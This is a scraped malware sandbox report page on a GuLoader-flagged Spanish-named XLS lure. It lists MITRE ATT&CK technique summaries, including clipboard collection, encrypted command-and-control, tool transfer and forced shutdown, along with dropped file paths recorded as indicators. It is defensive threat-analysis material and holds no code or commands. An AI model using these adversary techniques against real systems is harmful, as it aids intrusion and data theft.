Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869A5E80.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91FDCC81.png

C:\Users\user\AppData\Local\Temp\APPEASINGLY.ned

C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe

C:\Users\user\AppData\Local\Temp\BD3.tmp

C:\Users\user\AppData\Local\Temp\Fecundify.lnk

C:\Users\user\AppData\Local\Temp\MsMpLics.dll

C:\Users\user\AppData\Local\Temp\REPREHENSION.Deb

C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll

C:\Users\user\AppData\Local\Temp\Undergangsstemningen.ini

C:\Users\user\AppData\Local\Temp\avutil-54.dll

C:\Users\user\AppData\Local\Temp\folder-publicshare.png

C:\Users\user\AppData\Local\Temp\krista.ini

C:\Users\user\AppData\Local\Temp\lang-1045.dll

Windows Analysis Report
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre